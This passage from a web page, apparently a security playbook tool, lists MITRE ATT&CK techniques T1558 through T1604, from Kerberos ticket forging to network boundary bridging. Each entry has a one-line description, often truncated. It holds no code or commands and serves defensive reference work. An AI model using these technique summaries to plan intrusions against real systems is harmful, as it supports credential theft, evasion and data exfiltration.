
Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.

More Info

In Playbook

Steal or Forge Kerberos Tickets (T1558)

View on ATT&CK

Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.

More Info

In Playbook
Steal or Forge Kerberos Tickets

Golden Ticket (T1558.001)

View on ATT&CK

Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.

More Info

In Playbook
Steal or Forge Kerberos Tickets

Silver Ticket (T1558.002)

View on ATT&CK

Adversaries who have the password hash of a target service account (e.

More Info

In Playbook
Steal or Forge Kerberos Tickets

Kerberoasting (T1558.003)

View on ATT&CK

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.

More Info

In Playbook
Steal or Forge Kerberos Tickets

AS-REP Roasting (T1558.004)

View on ATT&CK

Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.

More Info

In Playbook
Steal or Forge Kerberos Tickets

Ccache Files (T1558.005)

View on ATT&CK

Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache).

More Info

In Playbook

Inter-Process Communication (T1559)

View on ATT&CK

Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution.

More Info

In Playbook
Inter-Process Communication

Component Object Model (T1559.001)

View on ATT&CK

Adversaries may use the Windows Component Object Model (COM) for local code execution.

More Info

In Playbook
Inter-Process Communication

Dynamic Data Exchange (T1559.002)

View on ATT&CK

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands.

More Info

In Playbook
Inter-Process Communication

XPC Services (T1559.003)

View on ATT&CK

Adversaries can provide malicious content to an XPC service daemon for local code execution.

More Info

In Playbook

Archive Collected Data (T1560)

View on ATT&CK

An adversary may compress and/or encrypt data that is collected prior to exfiltration.

More Info

In Playbook
Archive Collected Data

Archive via Utility (T1560.001)

View on ATT&CK

Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration.

More Info

In Playbook
Archive Collected Data

Archive via Library (T1560.002)

View on ATT&CK

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries.

More Info

In Playbook
Archive Collected Data

Archive via Custom Method (T1560.003)

View on ATT&CK

An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method.

More Info

In Playbook

Disk Wipe (T1561)

View on ATT&CK

Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources.

More Info

In Playbook
Disk Wipe

Disk Content Wipe (T1561.001)

View on ATT&CK

Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.

More Info

In Playbook
Disk Wipe

Disk Structure Wipe (T1561.002)

View on ATT&CK

Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.

More Info

In Playbook

Impair Defenses (T1562)

View on ATT&CK

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.

More Info

In Playbook
Impair Defenses

Disable or Modify Tools (T1562.001)

View on ATT&CK

Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.

More Info

In Playbook
Impair Defenses

Disable Windows Event Logging (T1562.002)

View on ATT&CK

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits.

More Info

In Playbook
Impair Defenses

Impair Command History Logging (T1562.003)

View on ATT&CK

Adversaries may impair command history logging to hide commands they run on a compromised system.

More Info

In Playbook
Impair Defenses

Disable or Modify System Firewall (T1562.004)

View on ATT&CK

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.

More Info

In Playbook
Impair Defenses

Indicator Blocking (T1562.006)

View on ATT&CK

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed.

More Info

In Playbook
Impair Defenses

Disable or Modify Cloud Firewall (T1562.007)

View on ATT&CK

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources.

More Info

In Playbook
Impair Defenses

Disable or Modify Cloud Logs (T1562.008)

View on ATT&CK

An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection.

More Info

In Playbook
Impair Defenses

Safe Mode Boot (T1562.009)

View on ATT&CK

Adversaries may abuse Windows safe mode to disable endpoint defenses.

More Info

In Playbook
Impair Defenses

Downgrade Attack (T1562.010)

View on ATT&CK

Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls.

More Info

In Playbook
Impair Defenses

Spoof Security Alerting (T1562.011)

View on ATT&CK

Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.

More Info

In Playbook
Impair Defenses

Disable or Modify Linux Audit System (T1562.012)

View on ATT&CK

Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection.

More Info

In Playbook

Remote Service Session Hijacking (T1563)

View on ATT&CK

Adversaries may take control of preexisting sessions with remote services to move laterally in an environment.

More Info

In Playbook
Remote Service Session Hijacking

SSH Hijacking (T1563.001)

View on ATT&CK

Adversaries may hijack a legitimate user's SSH session to move laterally within an environment.

More Info

In Playbook
Remote Service Session Hijacking

RDP Hijacking (T1563.002)

View on ATT&CK

Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment.

More Info

In Playbook

Hide Artifacts (T1564)

View on ATT&CK

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection.

More Info

In Playbook
Hide Artifacts

Hidden Files and Directories (T1564.001)

View on ATT&CK

Adversaries may set files and directories to be hidden to evade detection mechanisms.

More Info

In Playbook
Hide Artifacts

Hidden Users (T1564.002)

View on ATT&CK

Adversaries may use hidden users to hide the presence of user accounts they create or modify.

More Info

In Playbook
Hide Artifacts

Hidden Window (T1564.003)

View on ATT&CK

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.

More Info

In Playbook
Hide Artifacts

NTFS File Attributes (T1564.004)

View on ATT&CK

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection.

More Info

In Playbook
Hide Artifacts

Hidden File System (T1564.005)

View on ATT&CK

Adversaries may use a hidden file system to conceal malicious activity from users and security tools.

More Info

In Playbook
Hide Artifacts

Run Virtual Instance (T1564.006)

View on ATT&CK

Adversaries may carry out malicious operations using a virtual instance to avoid detection.

More Info

In Playbook
Hide Artifacts

VBA Stomping (T1564.007)

View on ATT&CK

Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.

More Info

In Playbook
Hide Artifacts

Email Hiding Rules (T1564.008)

View on ATT&CK

Adversaries may use email rules to hide inbound emails in a compromised user's mailbox.

More Info

In Playbook
Hide Artifacts

Resource Forking (T1564.009)

View on ATT&CK

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.

More Info

In Playbook
Hide Artifacts

Process Argument Spoofing (T1564.010)

View on ATT&CK

Adversaries may attempt to hide process command-line arguments by overwriting process memory.

More Info

In Playbook
Hide Artifacts

Ignore Process Interrupts (T1564.011)

View on ATT&CK

Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals.

More Info

In Playbook
Hide Artifacts

File/Path Exclusions (T1564.012)

View on ATT&CK

Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities.

More Info

In Playbook

Data Manipulation (T1565)

View on ATT&CK

Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.

More Info

In Playbook
Data Manipulation

Stored Data Manipulation (T1565.001)

View on ATT&CK

Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.

More Info

In Playbook
Data Manipulation

Transmitted Data Manipulation (T1565.002)

View on ATT&CK

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.

More Info

In Playbook
Data Manipulation

Runtime Data Manipulation (T1565.003)

View on ATT&CK

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.

More Info

In Playbook

Phishing (T1566)

View on ATT&CK

Adversaries may send phishing messages to gain access to victim systems.

More Info

In Playbook
Phishing

Spearphishing Attachment (T1566.001)

View on ATT&CK

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.

More Info

In Playbook
Phishing

Spearphishing Link (T1566.002)

View on ATT&CK

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems.

More Info

In Playbook
Phishing

Spearphishing via Service (T1566.003)

View on ATT&CK

Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems.

More Info

In Playbook
Phishing

Spearphishing Voice (T1566.004)

View on ATT&CK

Adversaries may use voice communications to ultimately gain access to victim systems.

More Info

In Playbook

Exfiltration Over Web Service (T1567)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

More Info

In Playbook
Exfiltration Over Web Service

Exfiltration to Code Repository (T1567.001)

View on ATT&CK

Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel.

More Info

In Playbook
Exfiltration Over Web Service

Exfiltration to Cloud Storage (T1567.002)

View on ATT&CK

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel.

More Info

In Playbook
Exfiltration Over Web Service

Exfiltration to Text Storage Sites (T1567.003)

View on ATT&CK

Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel.

More Info

In Playbook
Exfiltration Over Web Service

Exfiltration Over Webhook (T1567.004)

View on ATT&CK

Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel.

More Info

In Playbook

Dynamic Resolution (T1568)

View on ATT&CK

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations.

More Info

In Playbook
Dynamic Resolution

Fast Flux DNS (T1568.001)

View on ATT&CK

Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution.

More Info

In Playbook
Dynamic Resolution

Domain Generation Algorithms (T1568.002)

View on ATT&CK

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains.

More Info

In Playbook
Dynamic Resolution

DNS Calculation (T1568.003)

View on ATT&CK

Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address.

More Info

In Playbook

System Services (T1569)

View on ATT&CK

Adversaries may abuse system services or daemons to execute commands or programs.

More Info

In Playbook
System Services

Launchctl (T1569.001)

View on ATT&CK

Adversaries may abuse launchctl to execute commands or programs.

More Info

In Playbook
System Services

Service Execution (T1569.002)

View on ATT&CK

Adversaries may abuse the Windows service control manager to execute malicious commands or payloads.

More Info

In Playbook

Lateral Tool Transfer (T1570)

View on ATT&CK

Adversaries may transfer tools or other files between systems in a compromised environment.

More Info

In Playbook

Non-Standard Port (T1571)

View on ATT&CK

Adversaries may communicate using a protocol and port pairing that are typically not associated.

More Info

In Playbook

Protocol Tunneling (T1572)

View on ATT&CK

Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.

More Info

In Playbook

Encrypted Channel (T1573)

View on ATT&CK

Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

More Info

In Playbook
Encrypted Channel

Symmetric Cryptography (T1573.001)

View on ATT&CK

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

More Info

In Playbook
Encrypted Channel

Asymmetric Cryptography (T1573.002)

View on ATT&CK

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

More Info

In Playbook

Hijack Execution Flow (T1574)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs.

More Info

In Playbook
Hijack Execution Flow

DLL Search Order Hijacking (T1574.001)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs.

More Info

In Playbook
Hijack Execution Flow

DLL Side-Loading (T1574.002)

View on ATT&CK

Adversaries may execute their own malicious payloads by side-loading DLLs.

More Info

In Playbook
Hijack Execution Flow

Dylib Hijacking (T1574.004)

View on ATT&CK

Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime.

More Info

In Playbook
Hijack Execution Flow

Executable Installer File Permissions Weakness (T1574.005)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer.

More Info

In Playbook
Hijack Execution Flow

Dynamic Linker Hijacking (T1574.006)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries.

More Info

In Playbook
Hijack Execution Flow

Path Interception by PATH Environment Variable (T1574.007)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries.

More Info

In Playbook
Hijack Execution Flow

Path Interception by Search Order Hijacking (T1574.008)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs.

More Info

In Playbook
Hijack Execution Flow

Path Interception by Unquoted Path (T1574.009)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.

More Info

In Playbook
Hijack Execution Flow

Services File Permissions Weakness (T1574.010)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking the binaries used by services.

More Info

In Playbook
Hijack Execution Flow

Services Registry Permissions Weakness (T1574.011)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.

More Info

In Playbook
Hijack Execution Flow

COR_PROFILER (T1574.012)

View on ATT&CK

Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .

More Info

In Playbook
Hijack Execution Flow

KernelCallbackTable (T1574.013)

View on ATT&CK

Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.

More Info

In Playbook
Hijack Execution Flow

AppDomainManager (T1574.014)

View on ATT&CK

Adversaries may execute their own malicious payloads by hijacking how the .

More Info

In Playbook

Native API (T1575)

View on ATT&CK

Adversaries may use Android’s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions.

More Info

In Playbook

Uninstall Malicious Application (T1576)

View on ATT&CK

Adversaries may include functionality in malware that uninstalls the malicious application from the device.

More Info

In Playbook

Compromise Application Executable (T1577)

View on ATT&CK

Adversaries may modify applications installed on a device to establish persistent access to a victim.

More Info

In Playbook

Modify Cloud Compute Infrastructure (T1578)

View on ATT&CK

An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses.

More Info

In Playbook
Modify Cloud Compute Infrastructure

Create Snapshot (T1578.001)

View on ATT&CK

An adversary may create a snapshot or data backup within a cloud account to evade defenses.

More Info

In Playbook
Modify Cloud Compute Infrastructure

Create Cloud Instance (T1578.002)

View on ATT&CK

An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses.

More Info

In Playbook
Modify Cloud Compute Infrastructure

Delete Cloud Instance (T1578.003)

View on ATT&CK

An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.

More Info

In Playbook
Modify Cloud Compute Infrastructure

Revert Cloud Instance (T1578.004)

View on ATT&CK

An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence.

More Info

In Playbook
Modify Cloud Compute Infrastructure

Modify Cloud Compute Configurations (T1578.005)

View on ATT&CK

Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses.

More Info

In Playbook

Keychain (T1579)

View on ATT&CK

Adversaries may collect the keychain storage data from an iOS device to acquire credentials.

More Info

In Playbook

Cloud Infrastructure Discovery (T1580)

View on ATT&CK

An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment.

More Info

In Playbook

Geofencing (T1581)

View on ATT&CK

Adversaries may use a device’s geographical location to limit certain malicious behaviors.

More Info

In Playbook

SMS Control (T1582)

View on ATT&CK

Adversaries may delete, alter, or send SMS messages without user authorization.

More Info

In Playbook

Acquire Infrastructure (T1583)

View on ATT&CK

Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting.

More Info

In Playbook
Acquire Infrastructure

Domains (T1583.001)

View on ATT&CK

Adversaries may acquire domains that can be used during targeting.

More Info

In Playbook
Acquire Infrastructure

DNS Server (T1583.002)

View on ATT&CK

Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting.

More Info

In Playbook
Acquire Infrastructure

Virtual Private Server (T1583.003)

View on ATT&CK

Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting.

More Info

In Playbook
Acquire Infrastructure

Server (T1583.004)

View on ATT&CK

Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting.

More Info

In Playbook
Acquire Infrastructure

Botnet (T1583.005)

View on ATT&CK

Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting.

More Info

In Playbook
Acquire Infrastructure

Web Services (T1583.006)

View on ATT&CK

Adversaries may register for web services that can be used during targeting.

More Info

In Playbook
Acquire Infrastructure

Serverless (T1583.007)

View on ATT&CK

Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting.

More Info

In Playbook
Acquire Infrastructure

Malvertising (T1583.008)

View on ATT&CK

Adversaries may purchase online advertisements that can be abused to distribute malware to victims.

More Info

In Playbook

Compromise Infrastructure (T1584)

View on ATT&CK

Adversaries may compromise third-party infrastructure that can be used during targeting.

More Info

In Playbook
Compromise Infrastructure

Domains (T1584.001)

View on ATT&CK

Adversaries may hijack domains and/or subdomains that can be used during targeting.

More Info

In Playbook
Compromise Infrastructure

DNS Server (T1584.002)

View on ATT&CK

Adversaries may compromise third-party DNS servers that can be used during targeting.

More Info

In Playbook
Compromise Infrastructure

Virtual Private Server (T1584.003)

View on ATT&CK

Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting.

More Info

In Playbook
Compromise Infrastructure

Server (T1584.004)

View on ATT&CK

Adversaries may compromise third-party servers that can be used during targeting.

More Info

In Playbook
Compromise Infrastructure

Botnet (T1584.005)

View on ATT&CK

Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting.

More Info

In Playbook
Compromise Infrastructure

Web Services (T1584.006)

View on ATT&CK

Adversaries may compromise access to third-party web services that can be used during targeting.

More Info

In Playbook
Compromise Infrastructure

Serverless (T1584.007)

View on ATT&CK

Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting.

More Info

In Playbook
Compromise Infrastructure

Network Devices (T1584.008)

View on ATT&CK

Adversaries may compromise third-party network devices that can be used during targeting.

More Info

In Playbook

Establish Accounts (T1585)

View on ATT&CK

Adversaries may create and cultivate accounts with services that can be used during targeting.

More Info

In Playbook
Establish Accounts

Social Media Accounts (T1585.001)

View on ATT&CK

Adversaries may create and cultivate social media accounts that can be used during targeting.

More Info

In Playbook
Establish Accounts

Email Accounts (T1585.002)

View on ATT&CK

Adversaries may create email accounts that can be used during targeting.

More Info

In Playbook
Establish Accounts

Cloud Accounts (T1585.003)

View on ATT&CK

Adversaries may create accounts with cloud providers that can be used during targeting.

More Info

In Playbook

Compromise Accounts (T1586)

View on ATT&CK

Adversaries may compromise accounts with services that can be used during targeting.

More Info

In Playbook
Compromise Accounts

Social Media Accounts (T1586.001)

View on ATT&CK

Adversaries may compromise social media accounts that can be used during targeting.

More Info

In Playbook
Compromise Accounts

Email Accounts (T1586.002)

View on ATT&CK

Adversaries may compromise email accounts that can be used during targeting.

More Info

In Playbook
Compromise Accounts

Cloud Accounts (T1586.003)

View on ATT&CK

Adversaries may compromise cloud accounts that can be used during targeting.

More Info

In Playbook

Develop Capabilities (T1587)

View on ATT&CK

Adversaries may build capabilities that can be used during targeting.

More Info

In Playbook
Develop Capabilities

Malware (T1587.001)

View on ATT&CK

Adversaries may develop malware and malware components that can be used during targeting.

More Info

In Playbook
Develop Capabilities

Code Signing Certificates (T1587.002)

View on ATT&CK

Adversaries may create self-signed code signing certificates that can be used during targeting.

More Info

In Playbook
Develop Capabilities

Digital Certificates (T1587.003)

View on ATT&CK

Adversaries may create self-signed SSL/TLS certificates that can be used during targeting.

More Info

In Playbook
Develop Capabilities

Exploits (T1587.004)

View on ATT&CK

Adversaries may develop exploits that can be used during targeting.

More Info

In Playbook

Obtain Capabilities (T1588)

View on ATT&CK

Adversaries may buy and/or steal capabilities that can be used during targeting.

More Info

In Playbook
Obtain Capabilities

Malware (T1588.001)

View on ATT&CK

Adversaries may buy, steal, or download malware that can be used during targeting.

More Info

In Playbook
Obtain Capabilities

Tool (T1588.002)

View on ATT&CK

Adversaries may buy, steal, or download software tools that can be used during targeting.

More Info

In Playbook
Obtain Capabilities

Code Signing Certificates (T1588.003)

View on ATT&CK

Adversaries may buy and/or steal code signing certificates that can be used during targeting.

More Info

In Playbook
Obtain Capabilities

Digital Certificates (T1588.004)

View on ATT&CK

Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting.

More Info

In Playbook
Obtain Capabilities

Exploits (T1588.005)

View on ATT&CK

Adversaries may buy, steal, or download exploits that can be used during targeting.

More Info

In Playbook
Obtain Capabilities

Vulnerabilities (T1588.006)

View on ATT&CK

Adversaries may acquire information about vulnerabilities that can be used during targeting.

More Info

In Playbook
Obtain Capabilities

Artificial Intelligence (T1588.007)

View on ATT&CK

Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting.

More Info

In Playbook

Gather Victim Identity Information (T1589)

View on ATT&CK

Adversaries may gather information about the victim's identity that can be used during targeting.

More Info

In Playbook
Gather Victim Identity Information

Credentials (T1589.001)

View on ATT&CK

Adversaries may gather credentials that can be used during targeting.

More Info

In Playbook
Gather Victim Identity Information

Email Addresses (T1589.002)

View on ATT&CK

Adversaries may gather email addresses that can be used during targeting.

More Info

In Playbook
Gather Victim Identity Information

Employee Names (T1589.003)

View on ATT&CK

Adversaries may gather employee names that can be used during targeting.

More Info

In Playbook

Gather Victim Network Information (T1590)

View on ATT&CK

Adversaries may gather information about the victim's networks that can be used during targeting.

More Info

In Playbook
Gather Victim Network Information

Domain Properties (T1590.001)

View on ATT&CK

Adversaries may gather information about the victim's network domain(s) that can be used during targeting.

More Info

In Playbook
Gather Victim Network Information

DNS (T1590.002)

View on ATT&CK

Adversaries may gather information about the victim's DNS that can be used during targeting.

More Info

In Playbook
Gather Victim Network Information

Network Trust Dependencies (T1590.003)

View on ATT&CK

Adversaries may gather information about the victim's network trust dependencies that can be used during targeting.

More Info

In Playbook
Gather Victim Network Information

Network Topology (T1590.004)

View on ATT&CK

Adversaries may gather information about the victim's network topology that can be used during targeting.

More Info

In Playbook
Gather Victim Network Information

IP Addresses (T1590.005)

View on ATT&CK

Adversaries may gather the victim's IP addresses that can be used during targeting.

More Info

In Playbook
Gather Victim Network Information

Network Security Appliances (T1590.006)

View on ATT&CK

Adversaries may gather information about the victim's network security appliances that can be used during targeting.

More Info

In Playbook

Gather Victim Org Information (T1591)

View on ATT&CK

Adversaries may gather information about the victim's organization that can be used during targeting.

More Info

In Playbook
Gather Victim Org Information

Determine Physical Locations (T1591.001)

View on ATT&CK

Adversaries may gather the victim's physical location(s) that can be used during targeting.

More Info

In Playbook
Gather Victim Org Information

Business Relationships (T1591.002)

View on ATT&CK

Adversaries may gather information about the victim's business relationships that can be used during targeting.

More Info

In Playbook
Gather Victim Org Information

Identify Business Tempo (T1591.003)

View on ATT&CK

Adversaries may gather information about the victim's business tempo that can be used during targeting.

More Info

In Playbook
Gather Victim Org Information

Identify Roles (T1591.004)

View on ATT&CK

Adversaries may gather information about identities and roles within the victim organization that can be used during targeting.

More Info

In Playbook

Gather Victim Host Information (T1592)

View on ATT&CK

Adversaries may gather information about the victim's hosts that can be used during targeting.

More Info

In Playbook
Gather Victim Host Information

Hardware (T1592.001)

View on ATT&CK

Adversaries may gather information about the victim's host hardware that can be used during targeting.

More Info

In Playbook
Gather Victim Host Information

Software (T1592.002)

View on ATT&CK

Adversaries may gather information about the victim's host software that can be used during targeting.

More Info

In Playbook
Gather Victim Host Information

Firmware (T1592.003)

View on ATT&CK

Adversaries may gather information about the victim's host firmware that can be used during targeting.

More Info

In Playbook
Gather Victim Host Information

Client Configurations (T1592.004)

View on ATT&CK

Adversaries may gather information about the victim's client configurations that can be used during targeting.

More Info

In Playbook

Search Open Websites/Domains (T1593)

View on ATT&CK

Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting.

More Info

In Playbook
Search Open Websites/Domains

Social Media (T1593.001)

View on ATT&CK

Adversaries may search social media for information about victims that can be used during targeting.

More Info

In Playbook
Search Open Websites/Domains

Search Engines (T1593.002)

View on ATT&CK

Adversaries may use search engines to collect information about victims that can be used during targeting.

More Info

In Playbook
Search Open Websites/Domains

Code Repositories (T1593.003)

View on ATT&CK

Adversaries may search public code repositories for information about victims that can be used during targeting.

More Info

In Playbook

Search Victim-Owned Websites (T1594)

View on ATT&CK

Adversaries may search websites owned by the victim for information that can be used during targeting.

More Info

In Playbook

Active Scanning (T1595)

View on ATT&CK

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting.

More Info

In Playbook
Active Scanning

Scanning IP Blocks (T1595.001)

View on ATT&CK

Adversaries may scan victim IP blocks to gather information that can be used during targeting.

More Info

In Playbook
Active Scanning

Vulnerability Scanning (T1595.002)

View on ATT&CK

Adversaries may scan victims for vulnerabilities that can be used during targeting.

More Info

In Playbook
Active Scanning

Wordlist Scanning (T1595.003)

View on ATT&CK

Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques.

More Info

In Playbook

Search Open Technical Databases (T1596)

View on ATT&CK

Adversaries may search freely available technical databases for information about victims that can be used during targeting.

More Info

In Playbook
Search Open Technical Databases

DNS/Passive DNS (T1596.001)

View on ATT&CK

Adversaries may search DNS data for information about victims that can be used during targeting.

More Info

In Playbook
Search Open Technical Databases

WHOIS (T1596.002)

View on ATT&CK

Adversaries may search public WHOIS data for information about victims that can be used during targeting.

More Info

In Playbook
Search Open Technical Databases

Digital Certificates (T1596.003)

View on ATT&CK

Adversaries may search public digital certificate data for information about victims that can be used during targeting.

More Info

In Playbook
Search Open Technical Databases

CDNs (T1596.004)

View on ATT&CK

Adversaries may search content delivery network (CDN) data about victims that can be used during targeting.

More Info

In Playbook
Search Open Technical Databases

Scan Databases (T1596.005)

View on ATT&CK

Adversaries may search within public scan databases for information about victims that can be used during targeting.

More Info

In Playbook

Search Closed Sources (T1597)

View on ATT&CK

Adversaries may search and gather information about victims from closed (e.

More Info

In Playbook
Search Closed Sources

Threat Intel Vendors (T1597.001)

View on ATT&CK

Adversaries may search private data from threat intelligence vendors for information that can be used during targeting.

More Info

In Playbook
Search Closed Sources

Purchase Technical Data (T1597.002)

View on ATT&CK

Adversaries may purchase technical information about victims that can be used during targeting.

More Info

In Playbook

Phishing for Information (T1598)

View on ATT&CK

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting.

More Info

In Playbook
Phishing for Information

Spearphishing Service (T1598.001)

View on ATT&CK

Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting.

More Info

In Playbook
Phishing for Information

Spearphishing Attachment (T1598.002)

View on ATT&CK

Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting.

More Info

In Playbook
Phishing for Information

Spearphishing Link (T1598.003)

View on ATT&CK

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting.

More Info

In Playbook
Phishing for Information

Spearphishing Voice (T1598.004)

View on ATT&CK

Adversaries may use voice communications to elicit sensitive information that can be used during targeting.

More Info

In Playbook

Network Boundary Bridging (T1599)

View on ATT&CK

Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation.

More Info

In Playbook
Network Boundary Bridging

Network Address Translation Traversal (T1599.001)

View on ATT&CK

Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration.

More Info

In Playbook

Weaken Encryption (T1600)

View on ATT&CK

Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications.

More Info

In Playbook
Weaken Encryption

Reduce Key Space (T1600.001)

View on ATT&CK

Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.

More Info

In Playbook
Weaken Encryption

Disable Crypto Hardware (T1600.002)

View on ATT&CK

Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.

More Info

In Playbook

Modify System Image (T1601)

View on ATT&CK

Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.

More Info

In Playbook
Modify System Image

Patch System Image (T1601.001)

View on ATT&CK

Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.

More Info

In Playbook
Modify System Image

Downgrade System Image (T1601.002)

View on ATT&CK

Adversaries may install an older version of the operating system of a network device to weaken security.

More Info

In Playbook

Data from Configuration Repository (T1602)

View on ATT&CK

Adversaries may collect data related to managed devices from configuration repositories.

More Info

In Playbook
Data from Configuration Repository

SNMP (MIB Dump) (T1602.001)

View on ATT&CK

Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

More Info

In Playbook
Data from Configuration Repository

Network Device Configuration Dump (T1602.002)

View on ATT&CK

Adversaries may access network configuration files to collect sensitive data about the device and the network.

More Info

In Playbook

Scheduled Task/Job (T1603)

View on ATT&CK

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.

More Info

In Playbook

Proxy Through Victim (T1604)

View on ATT&CK
